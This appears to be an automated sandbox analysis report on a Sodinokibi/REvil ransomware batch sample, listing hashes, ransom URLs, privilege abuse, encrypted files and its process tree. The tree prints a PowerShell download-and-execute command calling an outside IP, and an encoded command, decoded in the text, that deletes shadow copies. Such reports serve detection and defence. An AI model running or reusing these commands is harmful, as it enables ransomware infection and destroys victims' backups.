Analysis
max time kernel: 35s
max time network: 53s
platform: windows7_x64
resource: win7v200430
submitted: 21-05-2020 17:10
Static task: static1
Behavioral task: behavioral1
  Sample: 9e366799514a8ce5bccab4fc1af01e1f.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: 9e366799514a8ce5bccab4fc1af01e1f.bat
  Resource: win10v200430
General
Target: 9e366799514a8ce5bccab4fc1af01e1f.bat
Size: 213B
MD5: 7563bdc5ef2e60e4af282d344dbde9ff
SHA1: 87ec59517e50fe716e21c255f572e11e0b810619
SHA256: a15036f075ca149cc6635c5eb2cb1bab41c2462e3ad0d2b36513aa29099d1424
SHA512: 178d9cca7b3a22c9fa0c5eaa052397bf36c815d64999ed5dc05d4e5922fcd28e7807a3ba8e3811e472838ec7de9746aa5cbd778ae48268e6af92a78f347c3f5f
Malware Config
Extracted: http://185.103.242.78/pastes/9e366799514a8ce5bccab4fc1af01e1f
Extracted: C:\j1x6ccx522-readme.txt
sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/736B31DC4CA46E7E
  http://decryptor.cc/736B31DC4CA46E7E
Signatures
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
  description | pid | process
  Token: SeDebugPrivilege | 1424 | powershell.exe
  Token: SeDebugPrivilege | 1424 | powershell.exe
  Token: SeDebugPrivilege | 1540 | powershell.exe
  Token: SeBackupPrivilege | 528 | vssvc.exe
  Token: SeRestorePrivilege | 528 | vssvc.exe
  Token: SeAuditPrivilege | 528 | vssvc.exe
  Token: SeTakeOwnershipPrivilege | 1424 | powershell.exe
Blacklisted process makes network request (1 IoCs)
Processes: powershell.exe
  flow | pid | process
  1 | 1424 | powershell.exe
Enumerates connected drives (3 TTPs)
Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
Drops file in Program Files directory (32 IoCs)
Processes: powershell.exe
  description | ioc | process
  File opened for modification | \??\c:\program files\GetStep.mhtml | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\j1x6ccx522-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\RedoDisconnect.m4v | powershell.exe
  File created | \??\c:\program files (x86)\j1x6ccx522-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\HideUnblock.pcx | powershell.exe
  File opened for modification | \??\c:\program files\LimitOptimize.ogg | powershell.exe
  File opened for modification | \??\c:\program files\SendTrace.M2V | powershell.exe
  File opened for modification | \??\c:\program files\UnpublishSuspend.easmx | powershell.exe
  File opened for modification | \??\c:\program files\OpenSave.png | powershell.exe
  File opened for modification | \??\c:\program files\TraceMeasure.search-ms | powershell.exe
  File opened for modification | \??\c:\program files\DenyReset.dwg | powershell.exe
  File opened for modification | \??\c:\program files\DismountExit.jpeg | powershell.exe
  File opened for modification | \??\c:\program files\GetRemove.txt | powershell.exe
  File opened for modification | \??\c:\program files\NewUse.ttc | powershell.exe
  File opened for modification | \??\c:\program files\TestReset.mpe | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\j1x6ccx522-readme.txt | powershell.exe
  File created | \??\c:\program files\j1x6ccx522-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\ConvertFromPublish.dib | powershell.exe
  File opened for modification | \??\c:\program files\ProtectMeasure.ogg | powershell.exe
  File opened for modification | \??\c:\program files\ResetNew.mp4v | powershell.exe
  File opened for modification | \??\c:\program files\TestRead.vssx | powershell.exe
  File opened for modification | \??\c:\program files\ExpandRemove.mhtml | powershell.exe
  File opened for modification | \??\c:\program files\InstallFormat.3gp2 | powershell.exe
  File opened for modification | \??\c:\program files\LimitHide.htm | powershell.exe
  File opened for modification | \??\c:\program files\MergeSelect.ogg | powershell.exe
  File opened for modification | \??\c:\program files\RevokeRead.DVR-MS | powershell.exe
  File opened for modification | \??\c:\program files\SaveConvert.i64 | powershell.exe
  File opened for modification | \??\c:\program files\SwitchDisconnect.scf | powershell.exe
  File opened for modification | \??\c:\program files\OpenEnter.mp4 | powershell.exe
  File opened for modification | \??\c:\program files\RemoveDisable.mpeg2 | powershell.exe
  File opened for modification | \??\c:\program files\SavePing.vstx | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\v3.5\j1x6ccx522-readme.txt | powershell.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
Processes: powershell.exe
  pid | process
  1424 | powershell.exe
Suspicious use of WriteProcessMemory (5 IoCs)
Processes: cmd.exe, powershell.exe
  description | pid | process | target process
  PID 1008 wrote to memory of 1424 | 1008 | cmd.exe | powershell.exe
  PID 1424 wrote to memory of 1540 | 1424 | powershell.exe | powershell.exe
  PID 1424 wrote to memory of 1540 | 1424 | powershell.exe | powershell.exe
  PID 1424 wrote to memory of 1540 | 1424 | powershell.exe | powershell.exe
  PID 1424 wrote to memory of 1540 | 1424 | powershell.exe | powershell.exe
Suspicious behavior: EnumeratesProcesses (77 IoCs)
Processes: powershell.exe, powershell.exe
  pid | process
  1424 | powershell.exe
  1424 | powershell.exe
  1424 | powershell.exe
  1540 | powershell.exe
  1540 | powershell.exe
  1424 | powershell.exe (every remaining entry in this signature is PID 1424, powershell.exe)
Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
Processes: powershell.exe
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\d20cojtlm5.bmp" | powershell.exe
Processes
C:\Windows\system32\cmd.exe (PID: 1008, depth 1)
  cmd /c "C:\Users\Admin\AppData\Local\Temp\9e366799514a8ce5bccab4fc1af01e1f.bat"
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID: 1424, depth 2)
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/9e366799514a8ce5bccab4fc1af01e1f');Invoke-CRSRXA;Start-Sleep -s 10000"
    - Suspicious use of AdjustPrivilegeToken
    - Blacklisted process makes network request
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: EnumeratesProcesses
    - Sets desktop wallpaper using registry
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID: 1540, depth 3)
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, which is what triggers the vssvc.exe activity recorded below)
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
C:\Windows\system32\vssvc.exe (PID: 528, depth 1)
  C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service